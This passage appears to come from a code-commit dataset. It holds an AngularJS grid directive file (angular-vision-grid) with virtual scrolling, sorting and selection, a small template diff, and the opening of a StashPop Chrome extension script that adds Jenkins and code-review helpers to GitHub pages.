ng-bind=\"column.headerText\"></span>\n"+ " <column-sort></column-sort>\n"+ " </div>\n"+ " </th>\n"+ " </tr>\n"+ " </thead>\n"+ " </table>\n"+ " </div>\n"+ " <div class=\"fixed-table-container-inner\" ng-style=\"styleContainerInner\">\n"+ " <div ng-style=\"viewPortStyle\" style=\"position: relative; display: block;\">\n"+ " <table class=\"table table-bordered table-vision\" ng-style=\"tablePortStyle\">\n"+ " <tbody>\n"+ " 
<!--tabindex=\"{{$parent.$parent.$index}}{{$index+1}}\"-->\n"+ " <tr ng-repeat-start=\"row in renderedProvider track by $index\"\n"+ " ng-init=\"row.item\"\n"+ " ng-class=\"{rendered:row.isRendered}\"\n"+ " ng-style=\"getRowStyle(row.item)\">\n"+ " <td ng-repeat=\"column in columns track by $index\"\n"+ " ng-show=\"column.visible\" \n"+ " ng-mousedown=\"selectItem(row.item, column)\"\n"+ " ng-dblclick=\"selectItemDblclick(row.item, column)\"\n"+ " ng-class=\"selectClass(row.item)\"\n"+ " vision-cell row-index=\"{{$parent.$index}}\" col-index=\"{{$index}}\"\n"+ " ng-style=\"getColumnStyle(column)\">\n"+ " <div ng-show=\"hasFocus($parent.$index, $index)\" tabindex=\"-1\"><input type=\"text\" grid-editor style=\"width: 100%\"></div>\n"+ " <span ng-show=\"!isItemRenderer(row.item, column) && !hasFocus($parent.$index, $index)\" ng-bind-html=\"getItem($parent.$index, row.item, column)\"></span>\n"+ " <div ng-show=\"isItemRenderer(row.item, column)\" ng-include=\"column.itemRenderer\"></div>\n"+ " </td>\n"+ " </tr>\n"+ " <tr class=\"actions text-left\" ng-show=\"row.expandRowOpened\" ng-repeat-end>\n"+ " <td ng-include=\"expandRow\" colspan=\"{{columns.length}}\" ></td>\n"+ " </tr>\n"+ " </tbody>\n"+ " </table>\n"+ " </div>\n"+ " </div>\n"+ " </div>\n"+ " <div class=\"header-footer\" ng-if=\"hasFooterBar()\">\n"+ " <div class=\"vs-footer-bar\" ng-include=\"footerBar\" ng-style=\"getHeaderFooterStyle()\"></div>\n"+ " </div>\n"+ " </div>\n"+ "</div>" ); $templateCache.put("template/vision/grid/column-sort.html", "<a ng-if=\"column.sortable\" ng-click=\"sortBy(column.fieldName)\">\n"+ " <span ng-bind=\"column.headerText\"></span>\n"+ " <i ng-class=\"selectSorterClass(column.fieldName)\"></i>\n"+ "</a>" ); $templateCache.put("template/vision/grid/expandColumnRenderer.html", "<a class=\"expand-row\" ng-click=\"openCloseExpandRow(item)\">\n" + " <i class=\"fa\" ng-class=\"{'fa-chevron-right': !item.expandRowOpened, 'fa-chevron-down': item.expandRowOpened}\"></i>\n" + "</a>" ); }]);
src/grid-directives.js
'use strict'; /* * angular-vision-grid * v1.0.0-rc2 * (c) 2014 VisionGrid Team http://vision-ti.com.br * License: MIT */ angular.module('vision.grid', ['vision.grid.util']) /** * Directive para ser utilizada pela coluna ao realizar o sort * Útil para ser utilizada dentro de um headerRenderer customizado */ .directive('columnSort', [function () { return { require: '^grid', restrict: 'E', templateUrl: 'template/vision/grid/column-sort.html' } }]) .directive('visionCell', [function(){ return { require: '^visionGrid', replace: 'A', link: function(scope, element, attrs, gridCtrl){ if (scope.column.editable){ var position = attrs.rowIndex + attrs.colIndex; scope.cells[position] = { rowIndex: parseInt(attrs.rowIndex), colIndex: parseInt(attrs.colIndex), element: element, column: scope.column }; } scope.hasFocus = function(rowIndex, colIndex){ return (String(rowIndex) + String(colIndex) == scope.cellIndex.current.position); }; } } }]) .directive('gridEditor', ['$compile', function ($compile) { return { require: '^visionGrid', replace: 'A', link: function (scope, element, attrs) { if (!attrs.ngModel){ element.attr('ng-model', 'row.item.' + scope.column.fieldName); $compile(element)(scope); } } }; }]) .directive('visionGrid', ['vsGridUtil', '$filter', '$timeout', '$window', '$animate', function (vsGridUtil, $filter, $timeout, $window, $animate) { return { restrict: 'E', replace: true, templateUrl: 'template/vision/grid/vision-grid.html', transclude: true, scope: { init: '&', provider: '=?', onSelect: '&', itemDoubleClick: '&', cellBlur: '&', height: '@', selectionMode: '@', headerHeight: '@', rowHeight: '@', rowColorFunction: '&', rowColorField: '@', scrollOffset: '@', headerBar: '@', footerBar: '@', expandRowUrl: '@', expandColumnHeader: '@', expandColumnRenderer: '@', toggleExpandRow: '=?', virtualScrollEnabled: '=?', minRows: '@' }, controller: ['$scope', '$element', '$attrs', function ($scope, $elment, $attrs) { this.nextCell = function(){ $scope.goToCell($scope.cellIndex.current.colIndex + 1); }; this.previousCell = function(){ $scope.goToCell($scope.cellIndex.current.colIndex - 1); }; /** * Disparado pelo grid column * @param column */ this.addColumn = function (column) { this.addColumnAt($scope.columns.length, column); }; /** * Adiciona uma coluna em uma posição específica * @param index * @param column */ this.addColumnAt = function (index, column) { if (!angular.isDefined(column.fieldName)) { throw 'When adding gridColumn, fieldName is required!'; } $scope.addColumnAt(index, column); }; /** * Retorna a coluna pelo fieldName * @param fieldName */ this.getColumnByFieldName = function (fieldName) { for (var i = 0; i < $scope.columns.length; i++) { if ($scope.columns[i].fieldName == fieldName) return $scope.columns[i]; } }; /** * Retorna a coluna pelo índice * @param $index * @returns {*} */ this.getColumn = function ($index) { return $scope.columns[$index]; }; /** * Retorna o array das colunas * @returns {Array} */ this.getColumns = function () { return $scope.columns; }; /** * Função para setar o provider manualmente no $scope da directive * @param provider */ this.setProvider = function (provider) { $scope.provider = provider; }; /** * Função para obter o item selecionado da grid * @return {Object} */ this.getSelectedItem = function () { return $scope.selectedItem; }; /** * Retorna a coluna selecionada * @returns {*|columnSelected|getData.columnSelected} */ this.getColumnSelected = function () { return $scope.columnSelected; }; //Update grid height and recalculate this.setHeight = function 
(value) { $scope.updateHeight(value); }; /** * Obtém o nome da grid */ this.getGridName = function () { return $scope.gridName; }; /** * Configura a expandRow * @param expandRowUrl */ this.setExpandRowUrl = function (expandRowUrl) { $scope.setExpandRowUrl(expandRowUrl); }; /** * Muda o outerScope padrão que é o scope.$parent * @param outerScope */ this.setOuterScope = function (outerScope) { $scope.outerScope = outerScope; }; }], link: function (scope, element, attrs, ctrl) { var userAgent = $window.navigator.userAgent.toLowerCase(); var isFirefox = userAgent.indexOf('firefox') > -1; var isOpera = userAgent.indexOf('opera') > -1; var commandKeyCode = isFirefox ? 224 : (isOpera ? 17 : 91 /* webkit */); scope.outerScope = scope.$parent; scope.cells = {}; scope.editableColumns = []; //Define se a expand-row será mantida aberta scope.toggleExpandRow = vsGridUtil.getDefined(scope.toggleExpandRow, true); scope.gridName = vsGridUtil.getDefined(attrs.name, 'grid'); //Cria uma referência do ctrl no scope do elemento parent angular.element(element[0].parentElement).scope()[scope.gridName] = ctrl; /** * Será a cópia do provider * Essencial para realizar o sort na lista para que o selectedIndex seja buscado pelo provider original * @type {Array} */ scope.gridProvider = []; /** * ng-repeat * @type {Array} */ scope.renderedProvider = []; scope.viewPortStyle = {}; scope.tablePortStyle = {}; scope.tablePortStyle.position = 'relative'; scope.columns = []; var minRows, headerHeight, height, rowHeight, viewPortHeight; // Define a quantidade mínima de linhas a serem exibidas na grid scope.minRows = vsGridUtil.getDefined(scope.minRows, '0'); minRows = Number(scope.minRows); //Seta o headerHeight scope.headerHeight = vsGridUtil.getDefined(scope.headerHeight, '30px'); headerHeight = Number(scope.headerHeight.replace('px', '')); scope.headerStyle = {}; scope.headerStyle.height = scope.headerHeight; scope.headerStyle.lineHeight = scope.headerHeight; // headerHeight attrs.rowHeight = vsGridUtil.getDefined(scope.rowHeight, '30px'); rowHeight = Number(attrs.rowHeight.replace('px', '')); //Altura da grid attrs.height = vsGridUtil.getDefined(attrs.height, '300px'); height = Number(attrs.height.replace('px', '')); scope.styleContainer = {}; scope.styleContainerInner = {}; if (scope.virtualScrollEnabled) { scope.styleContainer.height = attrs.height; scope.styleContainerInner.height = (height - headerHeight) + 'px'; } var innerContainer = element.find('.fixed-table-container-inner'); var headerBar = null, footerBar = null; var tableHeader = element.find('.table-header'); var spinner = element.find('#vs-grid-spinner'); var raw = innerContainer[0]; var rangeStart, rangeEnd; innerContainer.scroll(function (event) { //Header scroll(horizontal) if (headerBar == null && footerBar == null) { headerBar = element.find('.vs-header-bar'); footerBar = element.find('.vs-footer-bar'); } else { headerBar.offset({ left: (-1 * this.scrollLeft) + innerContainer.offset().left}); footerBar.offset({ left: (-1 * this.scrollLeft) + innerContainer.offset().left}); } tableHeader.offset({ left: (-1 * this.scrollLeft) + innerContainer.offset().left}); if (scope.virtualScrollEnabled) { //Virtual scroll(vertical) rangeStart = Math.ceil(raw.scrollTop / rowHeight); rangeEnd = Math.ceil((raw.scrollTop + raw.offsetHeight) / rowHeight); if (raw.scrollTop + raw.offsetHeight <= viewPortHeight) { scope.tablePortStyle.top = raw.scrollTop + 'px'; scope.renderProvider(scope.gridProvider.slice(rangeStart, rangeEnd)); scope.$digest(); } } }); /** * Change scroll 
position to rowIndex */ scope.scrollToRowIndex = function(rowIndex){ $timeout(function(){ if (rowIndex < rangeStart){ raw.scrollTop -= rowHeight; innerContainer.scroll(); }else if (rowIndex + 1 > rangeEnd){ raw.scrollTop += rowHeight; innerContainer.scroll(); } }); }; /** * Return virtual rows length to render rows with no data, for visual purposes * @returns {number} */ var getVirtualRowsLength = function () { return scope.virtualScrollEnabled ? Math.ceil((height - headerHeight) / rowHeight) : scope.gridProvider.length; }; /** * Update virtual scroll height * @param value */ scope.updateHeight = function (value) { height = value; scope.styleContainer.height = height + 'px'; scope.styleContainerInner.height = (height - headerHeight) + 'px'; scope.renderProvider(scope.gridProvider, getVirtualRowsLength()); scope.$apply(); }; /** * Adds the rows to be rendered */ scope.renderProvider = function (rows, length) { if (length == undefined) { length = rows.length; } scope.renderedProvider.length = length; for (var i = 0; i < length || i < minRows; i++) { if (angular.isDefined(rows[i])) { scope.renderedProvider[i] = {item:rows[i]}; } else { scope.renderedProvider[i] = {}; } } }; /** * Updates the gridProvider */ scope.$watchCollection('provider', function (newValue, oldValue) { clearSelection(); //Makes a copy of the provider scope.gridProvider = []; if (scope.provider != null && scope.provider != undefined) angular.extend(scope.gridProvider, scope.provider); //Calculates the viewPort height for virtual scroll if (scope.virtualScrollEnabled && angular.isDefined(newValue) && newValue.length > 0) { viewPortHeight = newValue.length * rowHeight; scope.viewPortStyle.height = viewPortHeight + 'px'; } if (oldValue == undefined || newValue == undefined || newValue.length != oldValue.length) { $timeout(function () { raw.scrollTop = 0; innerContainer.scroll(); }); } }); /** * Updates the renderedProvider */ scope.$watchCollection('gridProvider', function (value) { //Renders the rows (renders virtual rows with no data when virtualScrollEnabled) scope.renderProvider(scope.gridProvider, getVirtualRowsLength()); rangeStart = 0; rangeEnd = scope.renderedProvider.length; }); /** * Configures the row style * @param item * @returns {{}} */ scope.getRowStyle = function (item) { var rowStyle = {}; rowStyle.height = scope.rowHeight; //Sets the row background color from a property of the provider item if (angular.isDefined(scope.rowColorField)) { var color = vsGridUtil.evaluate(item, scope.rowColorField); if (angular.isDefined(color)) rowStyle.backgroundColor = color; } //Sets the background color according to a function if (angular.isDefined(attrs.rowColorFunction)) { var color = scope.rowColorFunction({$item: item}); if (angular.isDefined(color)) rowStyle.backgroundColor = color; } return rowStyle; }; /** * Configures the column style * @param column */ scope.getColumnStyle = function (column, position) { var columnStyle = {}; if (position == 'header') { columnStyle.textAlign = column.headerTextAlign; } else { columnStyle.textAlign = column.textAlign; } if (angular.isDefined(column.width)) columnStyle.width = column.width; else { columnStyle.minWidth = '80px'; columnStyle.width = 'auto !important'; } return columnStyle; }; /** * Adds the column * Private function * @param index * @param column */ scope.addColumnAt = function (index, column) { column.index = index; if (column instanceof GridColumnDecimal && !angular.isDefined(column.labelFunction)) { column.labelFunction =
vsGridUtil.formatDecimal; } if (column instanceof GridColumnDate && !angular.isDefined(column.labelFunction)) { column.labelFunction = vsGridUtil.formatDate; } if (column instanceof GridColumnEnum && !angular.isDefined(column.labelFunction)) { column.labelFunction = vsGridUtil.formatEnum; } if (column.editable) scope.editableColumns.push(column); /** * Event emitted on the $rootScope for configuring * the labelFunction of other column implementations */ scope.$emit('grid:addColumn', column); scope.columns.splice(index, 0, column); }; /** * Returns the item's String to display in the grid * @param item * @param column * @returns {*} */ scope.getItem = function ($index, item, column) { var valueOf; if (angular.isFunction(column.labelFunction)) { valueOf = column.labelFunction(item, column, $index); } else valueOf = vsGridUtil.evaluate(item, column.fieldName); return valueOf != undefined ? valueOf.toString() : ''; }; /** * Checks whether a headerRenderer was provided on the column * @param column * @returns {boolean|*} */ scope.isHeaderRenderer = function (column) { return angular.isDefined(column.headerRenderer); }; /** * Checks whether an itemRenderer was provided * @param column * @returns {boolean} */ scope.isItemRenderer = function (item, column) { return angular.isDefined(column.itemRenderer); }; /** * Fires the double-click */ scope.selectItemDblclick = function (item, column) { scope.selectItem(item, column); if (attrs.itemDoubleClick) { scope.itemDoubleClick({$data: scope.getData()}); } scope.$emit(scope.gridName + ':itemDoubleClick', scope.getData()); }; /** * Sets the selectedItem * @param item */ scope.selectedItems = []; attrs.selectionMode = vsGridUtil.getDefined(scope.selectionMode, 'single'); var begin, end, virtualIndex, lastIndex = -1; scope.selectItem = function (item, column) { scope.columnSelected = column; if (!angular.isDefined(item)) return; scope.selectedIndex = scope.provider.indexOf(item); virtualIndex = scope.gridProvider.indexOf(item); scope.selectedItem = item; if (scope.shiftKey) { if (lastIndex == -1) { lastIndex = virtualIndex; scope.selectedItems = []; } if (lastIndex < virtualIndex) { begin = lastIndex; end = virtualIndex; } else { begin = virtualIndex; end = lastIndex; } scope.selectedItems = scope.gridProvider.slice(begin, end + 1); } else if (scope.ctrlKey) { if (scope.selectedItems.indexOf(item) == -1) scope.selectedItems.push(item); else { var indexOf = scope.selectedItems.indexOf(item); scope.selectedItems.splice(indexOf, 1); } lastIndex = virtualIndex; } else { lastIndex = virtualIndex; scope.selectedItems = [item]; } if (angular.isDefined(attrs.onSelect)) { //Callback function for the selected item scope.onSelect({$data: scope.getData()}); } scope.$emit(scope.gridName + ':onSelect', scope.getData()); }; /** * Object with the selected grid item's information * @returns {{}} */ scope.getData = function () { var $data = {}; $data.selectedIndex = scope.selectedIndex; $data.selectedItem = scope.selectedItem; $data.columnSelected = scope.columnSelected; $data.selectedItems = scope.selectedItems; return $data; }; /** * Clears the selection * @private */ var clearSelection = function () { scope.selectedItems = []; scope.selectedItem = null; scope.selectedIndex = null; scope.selectedColumn = null; }; /** * When an item is clicked, assigns the selection class * @param item * @returns {string} */ scope.selectClass = function (item) { if ((item == scope.selectedItem && scope.selectionMode == 'single') || (scope.selectedItems.indexOf(item) != -1 && scope.selectionMode ==
'multiple')) { return 'selected-item'; } else return ''; }; /** * onKeyDown * @param $event */ scope.onKeyDown = function ($event) { if ($event.keyCode == 9) { if ($event.shiftKey){ ctrl.previousCell(); }else{ ctrl.nextCell(); } $event.preventDefault(); } if ($event.keyCode == 38 || $event.keyCode == 40) { if (virtualIndex == undefined) virtualIndex = -1; //up key if ($event.keyCode == 38) { if (virtualIndex < 0) { virtualIndex = 0; } else if (virtualIndex > 0) { virtualIndex--; } } //down key if ($event.keyCode == 40) { if (virtualIndex > scope.gridProvider.length) { virtualIndex = scope.gridProvider.length; } else if (virtualIndex < scope.gridProvider.length) { virtualIndex++; } } scope.selectItem(scope.gridProvider[virtualIndex], scope.selectedColumn); scope.scrollToRowIndex(virtualIndex); } if (scope.selectionMode == 'multiple') { scope.shiftKey = $event.shiftKey; scope.ctrlKey = $event.ctrlKey || $event.keyCode == commandKeyCode; } scope.$emit(scope.gridName + ':onKeyDown', $event); }; scope.cellIndex = {current:{rowIndex: -1, colIndex: -1, position: '-1'}}; scope.cellIndex.old = scope.cellIndex.current; scope.goToCell = function(colIndex){ if (virtualIndex == undefined) virtualIndex = -1; if (scope.cellIndex.current.rowIndex == -1){ scope.cellIndex.current.rowIndex = 0; scope.cellIndex.current.colIndex = 0; } var rowIndex = scope.cellIndex.current.rowIndex; if (colIndex < 0){ virtualIndex--; rowIndex--; colIndex = scope.editableColumns[scope.editableColumns.length - 1].index; }else if (colIndex > scope.editableColumns.length -1){ virtualIndex++; rowIndex++; colIndex = scope.editableColumns[0].index; } var position = String(rowIndex) + String(scope.editableColumns[colIndex].index); var cell = scope.cells[position]; if (cell){ if (attrs.cellBlur && scope.cellIndex.old != scope.cellIndex.current){ scope.cellBlur({ $data:{ oldCell: scope.cells[scope.cellIndex.old.position], cell: scope.cells[scope.cellIndex.current.position], selectedItem: scope.getData().selectedItem } }); } scope.cellIndex.old = scope.cellIndex.current; scope.cellIndex.current.rowIndex = rowIndex; scope.cellIndex.current.colIndex = colIndex; scope.cellIndex.current.position = position; $timeout(function(){ angular.element(cell.element).find('input')[0].focus(); }); }else if (rowIndex > scope.renderedProvider.length - 1){ scope.scrollToRowIndex(virtualIndex); scope.goToCell(0); } }; /** * onKeyUp * @param $event */ scope.onKeyUp = function ($event) { if (scope.selectionMode == 'multiple') { scope.shiftKey = $event.shiftKey; scope.ctrlKey = $event.ctrlKey; if ($event.keyCode == commandKeyCode) scope.ctrlKey = false; } scope.$emit(scope.gridName + ':onKeyUp', $event); }; //Sort object scope.sort = { sortingField: 'id', reverse: false }; /** * CSS class for the sorter * @param fieldName * @returns {string} */ scope.selectSorterClass = function (fieldName) { if (fieldName == scope.sort.sortingField) { return ('glyphicon glyphicon-chevron-' + ((scope.sort.reverse) ?
'down' : 'up')); } else { return ''; } }; /** * Performs the sort * @param newSortingField */ scope.sortBy = function (newSortingField) { if (scope.sort.sortingField == newSortingField) { scope.sort.reverse = !scope.sort.reverse; } scope.sort.sortingField = newSortingField; scope.gridProvider = $filter('orderBy')(scope.provider, scope.sort.sortingField, scope.sort.reverse); }; /** * Checks whether there is a headerBar * @returns {boolean|*} */ scope.hasHeaderBar = function () { return angular.isDefined(attrs.headerBar); }; /** * Checks whether there is a footerBar * @returns {boolean|*} */ scope.hasFooterBar = function () { return angular.isDefined(attrs.footerBar); }; /** * Style header-footer */ var headerFooterStyle = {}; scope.getHeaderFooterStyle = function () { headerFooterStyle.width = innerContainer[0].scrollWidth; return headerFooterStyle; }; //Function triggered by the expandColumnRenderer scope.openCloseExpandRow = function (item) { item.expandRowOpened = !item.expandRowOpened; if (scope.toggleExpandRow) { angular.forEach(scope.renderedProvider, function (value, index) { if (value != item) value.expandRowOpened = false; }); } }; scope.expandRow = undefined; /** * Configures the expandRow */ scope.setExpandRowUrl = function (expandRowUrl) { scope.expandRow = expandRowUrl; attrs.expandColumnRenderer = vsGridUtil.getDefined(scope.expandColumnRenderer, 'template/vision/grid/expandColumnRenderer.html'); var expandColumn = new GridColumn(); expandColumn.fieldName = 'expandColumn'; expandColumn.width = '70px'; expandColumn.textAlign = 'center'; expandColumn.itemRenderer = attrs.expandColumnRenderer; if (angular.isDefined(scope.expandColumnHeader)) { expandColumn.headerText = scope.expandColumnHeader; } scope.addColumnAt(0, expandColumn); }; if (angular.isDefined(scope.expandRowUrl)) scope.setExpandRowUrl(scope.expandRowUrl); /** * Fires the config method to initialize the columns */ if (angular.isDefined(attrs.init)) { scope.init({$ctrl: ctrl}); scope.$emit(scope.gridName + ':init', {$ctrl: ctrl}); } } } } ]) .run(["$templateCache", function($templateCache) { $templateCache.put("template/vision/grid/vision-grid.html", "<div class=\"row\">\n"+ " <div class=\"vs-grid col-sm-12\">\n"+ " <div class=\"header-footer\" ng-if=\"hasHeaderBar()\">\n"+ " <div class=\"vs-header-bar\" ng-include=\"headerBar\" ng-style=\"getHeaderFooterStyle()\"></div>\n"+ " </div>\n"+ " <div class=\"fixed-table-container\" ng-style=\"styleContainer\" class=\"table table-bordered\" tabindex=\"0\" ng-keydown=\"onKeyDown($event)\" ng-keyup=\"onKeyUp($event)\">\n"+ " <div class=\"table-header\">\n"+ " <table class=\"table-bordered table-vision\">\n"+ " <thead>\n"+ " <tr>\n"+ " <th ng-repeat=\"column in columns track by $index\"\n"+ " class=\"vs-grid-column\"\n"+ " ng-show=\"column.visible\"\n"+ " ng-style=\"getColumnStyle(column, 'header')\"\n"+ " ng-class=\"{first: $first}\">\n"+ " <div ng-style=\"headerStyle\" ng-show=\"isHeaderRenderer(column)\" ng-include=\"column.headerRenderer\"></div>\n"+ " <div ng-style=\"headerStyle\" ng-show=\"!isHeaderRenderer(column)\">\n"+ " <span ng-show=\"!column.sortable\" ng-bind=\"column.headerText\"></span>\n"+ " <column-sort></column-sort>\n"+ " </div>\n"+ " </th>\n"+ " </tr>\n"+ " </thead>\n"+ " </table>\n"+ " </div>\n"+ " <div class=\"fixed-table-container-inner\" scrollbar ng-style=\"styleContainerInner\">\n"+ " <div ng-style=\"viewPortStyle\" style=\"position: relative; display: block;\">\n"+ " <table class=\"table table-bordered table-vision\" ng-style=\"tablePortStyle\">\n"+ " <tbody>\n"+ " 
<!--tabindex=\"{{$parent.$parent.$index}}{{$index+1}}\"-->\n"+ " <tr ng-repeat-start=\"row in renderedProvider track by $index\"\n"+ " ng-init=\"row.item\"\n"+ " ng-class=\"{rendered:row.isRendered}\"\n"+ " ng-style=\"getRowStyle(row.item)\">\n"+ " <td ng-repeat=\"column in columns track by $index\"\n"+ " ng-show=\"column.visible\" \n"+ " ng-mousedown=\"selectItem(row.item, column)\"\n"+ " ng-dblclick=\"selectItemDblclick(row.item, column)\"\n"+ " ng-class=\"selectClass(row.item)\"\n"+ " vision-cell row-index=\"{{$parent.$index}}\" col-index=\"{{$index}}\"\n"+ " ng-style=\"getColumnStyle(column)\">\n"+ " <div ng-show=\"hasFocus($parent.$index, $index)\" tabindex=\"-1\"><input type=\"text\" grid-editor style=\"width: 100%\"></div>\n"+ " <span ng-show=\"!isItemRenderer(row.item, column) && !hasFocus($parent.$index, $index)\" ng-bind-html=\"getItem($parent.$index, row.item, column)\"></span>\n"+ " <div ng-show=\"isItemRenderer(row.item, column)\" ng-include=\"column.itemRenderer\"></div>\n"+ " </td>\n"+ " </tr>\n"+ " <tr class=\"actions text-left\" ng-show=\"row.expandRowOpened\" ng-repeat-end>\n"+ " <td ng-include=\"expandRow\" colspan=\"{{columns.length}}\" ></td>\n"+ " </tr>\n"+ " </tbody>\n"+ " </table>\n"+ " </div>\n"+ " </div>\n"+ " </div>\n"+ " <div class=\"header-footer\" ng-if=\"hasFooterBar()\">\n"+ " <div class=\"vs-footer-bar\" ng-include=\"footerBar\" ng-style=\"getHeaderFooterStyle()\"></div>\n"+ " </div>\n"+ " </div>\n"+ "</div>" ); $templateCache.put("template/vision/grid/column-sort.html", "<a ng-if=\"column.sortable\" ng-click=\"sortBy(column.fieldName)\">\n"+ " <span ng-bind=\"column.headerText\"></span>\n"+ " <i ng-class=\"selectSorterClass(column.fieldName)\"></i>\n"+ "</a>" ); $templateCache.put("template/vision/grid/expandColumnRenderer.html", "<a class=\"expand-row\" ng-click=\"openCloseExpandRow(item)\">\n" + " <i class=\"fa\" ng-class=\"{'fa-chevron-right': !item.expandRowOpened, 'fa-chevron-down': item.expandRowOpened}\"></i>\n" + "</a>" ); }]);
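The directive registration and module name are not visible in this excerpt, so the following is only a hedged usage sketch: the element name vision-grid, the module name app, and the controller OrdersCtrl are assumptions, while the provider/name/init/height bindings, the $ctrl argument passed through init, the setExpandRowUrl controller method, and the gridName-prefixed onSelect event all come from the directive code above.

// Hypothetical markup (directive element name assumed):
// <vision-grid name="ordersGrid" provider="orders" height="300px" row-height="30px"
//              virtual-scroll-enabled="true" init="configureGrid($ctrl)"></vision-grid>
angular.module('app').controller('OrdersCtrl', ['$scope', function ($scope) {
    // Data bound to the grid's provider attribute
    $scope.orders = [{ id: 1, customer: 'Acme', total: 199.9 }];

    // Invoked through the directive's init binding with the grid controller ($ctrl)
    $scope.configureGrid = function (gridCtrl) {
        gridCtrl.setExpandRowUrl('views/order-details.html'); // optional expand-row template (path is an assumption)
    };

    // The grid $emits events prefixed with its name attribute, e.g. 'ordersGrid:onSelect';
    // the payload is the object built by scope.getData() in the directive
    $scope.$on('ordersGrid:onSelect', function (event, data) {
        console.log('selected', data.selectedItem, 'at index', data.selectedIndex);
    });
}]);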
Update grid-directives.js
src/grid-directives.js
Update grid-directives.js
<ide><path>src/grid-directives.js <ide> " </thead>\n"+ <ide> " </table>\n"+ <ide> " </div>\n"+ <del> " <div class=\"fixed-table-container-inner\" scrollbar ng-style=\"styleContainerInner\">\n"+ <add> " <div class=\"fixed-table-container-inner\" ng-style=\"styleContainerInner\">\n"+ <ide> " <div ng-style=\"viewPortStyle\" style=\"position: relative; display: block;\">\n"+ <ide> " <table class=\"table table-bordered table-vision\" ng-style=\"tablePortStyle\">\n"+ <ide> " <tbody>\n"+
JavaScript
mit
375b4bf575af4df82cbacdebcb6ad43a02203b00
0
dpoeschl/StashPop,dpoeschl/StashPop
// Constants var stashPopClassName = "stashPop"; var jenkinsReloadableInfoClassName = "jenkinsReloadableInfo"; // This list must match the list specified in reload() var option_emailIssuesList = "emailIssuesList"; var option_emailIssue = "emailIssue"; var option_emailPullRequestList = "emailPullRequestList"; var option_emailPullRequest = "emailPullRequest"; var option_jenkinsOpenDetailsLinksInNewTab = "jenkinsOpenDetailsLinksInNewTab"; var option_jenkinsShowRunTime = "jenkinsShowRunTime"; var option_jenkinsShowFailureIndications = "jenkinsShowFailureIndications"; var option_jenkinsShowTestFailures = "jenkinsShowTestFailures"; var option_jenkinsShowBugFilingButton = "jenkinsShowBugFilingButton"; var option_jenkinsShowRetestButton = "jenkinsShowRetestButton"; var option_jenkinsOfferInlineFailuresOnPRList = "jenkinsOfferInlineFailuresOnPRList"; var option_issueCreationRouting = "issueCreationRouting"; var option_nonDefaultTestInfo = "nonDefaultTestInfo"; var option_defaultIssueLabels = "defaultIssueLabels"; var option_testRerunText = "testRerunText"; var option_showCodeReviewInfo = "showCodeReviewInfo"; var option_codeReviewOptions = "codeReviewOptions"; document.addEventListener("DOMContentLoaded", function () { "use strict"; log("DOMContentLoaded"); try { initialSetup(); reload(true); } catch (err) { logfailure(err); } }); function initialSetup() { log("Performing initial setup"); configureTooltips(); var s = document.createElement('script'); s.src = chrome.extension.getURL('scripts/injectedcode.js'); s.onload = function () { this.parentNode.removeChild(this); }; (document.head || document.documentElement).appendChild(s); document.addEventListener('_pjax:end', function () { log("Detected page data changed."); reload(false); }, false); } function configureTooltips() { log("Configuring tooltips"); $(document).tooltip({ items: "[stashpop-title]", track: false, close: function (evt, ui) { $(document).data("ui-tooltip").liveRegion.children().remove(); }, position: { my: "left+5 top+5", at: "left bottom" }, tooltipClass: "ui-tooltip", show: "slideDown", hide: false, content: function () { var element = $(this); if (element.is("[stashpop-title]")) { var text = element.attr("stashpop-title"); return text; // "<b>What up?</b> Yo?"; } } }); } function reload(firstRun) { resetGlobals(); log("Remove all StashPop elements and reload data"); $('.' 
+ stashPopClassName).remove(); chrome.runtime.sendMessage({ method: "getSettings", keys: [ option_emailIssuesList, option_emailIssue, option_emailPullRequestList, option_emailPullRequest, option_jenkinsOpenDetailsLinksInNewTab, option_jenkinsShowRunTime, option_jenkinsShowFailureIndications, option_jenkinsShowTestFailures, option_jenkinsShowBugFilingButton, option_jenkinsShowRetestButton, option_jenkinsOfferInlineFailuresOnPRList, option_issueCreationRouting, option_nonDefaultTestInfo, option_defaultIssueLabels, option_testRerunText, option_showCodeReviewInfo, option_codeReviewOptions ] }, function (currentSettings) { if (isIndividualItemPage) { var title = document.getElementsByClassName("js-issue-title")[0].innerHTML; var number = document.getElementsByClassName("gh-header-number")[0].innerHTML.substring(1); // https://github.com/dotnet/roslyn/pull/5786 var isPull = postDomainUrlParts[2] == "pull"; if (isPull && currentSettings[option_showCodeReviewInfo]) { var bestCodeReviewOptions = getBestCodeReviewOptions(currentSettings[option_codeReviewOptions]); observeCommentFieldChanges(bestCodeReviewOptions); addCodeReviewSummaryAndButtons(bestCodeReviewOptions); } addButtonsToIndividualItemPage(title, number, isPull, currentSettings); makeBuildStatusWindowsBig(); if (currentSettings[option_jenkinsOpenDetailsLinksInNewTab]) { openJenkinsDetailsInNewTab(currentSettings); } } if (isListPage) { // https://github.com/dotnet/roslyn/pulls/dpoeschl // https://github.com/pulls var isPull = postDomainUrlParts[2] == "pulls" || (currentPageOrg == null && postDomainUrlParts[0] == "pulls"); addButtonsToListPage(isPull, currentSettings); } reloadJenkins(firstRun, currentSettings); } ); } function observeCommentFieldChanges(codeReviewOptions) { var splitCodeOptions = codeReviewOptions.split(";"); var positiveIndicatorsString = splitCodeOptions[1].trim(); var negativeIndicatorsString = splitCodeOptions[2].trim(); var testedIndicatorsString = splitCodeOptions[3].trim(); if (positiveIndicatorsString.length == 0 && negativeIndicatorsString.length == 0 && testedIndicatorsString.length == 0) { log("Empty code review options. Bail.") return; } var positiveIndicators = positiveIndicatorsString.split(","); var negativeIndicators = negativeIndicatorsString.split(","); var testedIndicators = testedIndicatorsString.split(","); var target = document.querySelector('#new_comment_field'); var observer = new MutationObserver(function (mutations) { mutations.forEach(function (mutation) { var text = target.value; for (var c = 0; c < positiveIndicators.length; c++) { if (text.indexOf(positiveIndicators[c]) >= 0) { $(".comment-form-head:visible").each(function () { this.style.backgroundColor = "#77ff77"; }); return; } } for (var c = 0; c < negativeIndicators.length; c++) { if (text.indexOf(negativeIndicators[c]) >= 0) { $(".comment-form-head:visible").each(function () { this.style.backgroundColor = "#ff7777"; }); return; } } for (var c = 0; c < testedIndicators.length; c++) { if (text.indexOf(testedIndicators[c]) >= 0) { $(".comment-form-head:visible").each(function () { this.style.backgroundColor = "#77ccff"; }); return; } } // Default background color $(".comment-form-head:visible").each(function () { this.style.backgroundColor = "#f7f7f7"; }); }); }); var config = { attributes: true, childList: true, characterData: true }; observer.observe(target, config); } function reloadJenkins(firstRun, currentSettings) { if (!firstRun) { log("Deleting inlined Jenkins data"); $('.' 
